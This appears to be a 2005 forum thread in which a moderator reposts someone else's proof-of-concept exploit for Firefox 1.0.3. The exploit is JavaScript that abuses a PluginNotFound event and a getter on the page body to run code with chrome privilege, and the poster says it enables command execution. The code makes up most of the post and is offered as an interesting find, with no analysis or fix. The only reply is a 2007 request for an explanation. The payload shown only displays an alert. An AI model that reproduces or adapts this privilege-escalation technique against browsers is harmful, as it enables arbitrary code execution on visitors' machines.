June 30, 2022, 01:12:17 PM

Author Topic: Firefox exploit  (Read 5825 times)

0 Members and 1 Guest are viewing this topic.

Offline benthehutt

  • Global Moderator
  • Seasoned Poster
  • *****
  • Posts: 368
  • Country:
  • "Drugs? You'd better not be!" - my mom
    • Echelon9
Firefox exploit
« on: May 29, 2005, 09:06:09 PM »
I found a pretty dangerous firefox mishap, turns out you can get some pretty major command executions exploits from something like this:

<html>
<head>
<title>Proof-of-Concept for Firefox 1.0.3 - by moz_bug_r_a4</title>
<body>
<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";

var script = (function() {
function x() { new Object(); }
return new Script(scriptCode);
})();

document.body.__defineGetter__("type", function() {
return { toString : script };
});

var event = document.createEvent("Events");
event.initEvent("PluginNotFound", true, true);
document.body.dispatchEvent(event);
</script>
</body>


I didn't write it, just thought it was interesting.
Build a man a fire, and he'll be warm for a day. Set a man on fire, and he'll be warm for the rest of his life.

akshayd

  • Guest
Re:Firefox exploit
« Reply #1 on: February 28, 2007, 10:40:31 AM »
can u explan what exactly it dose????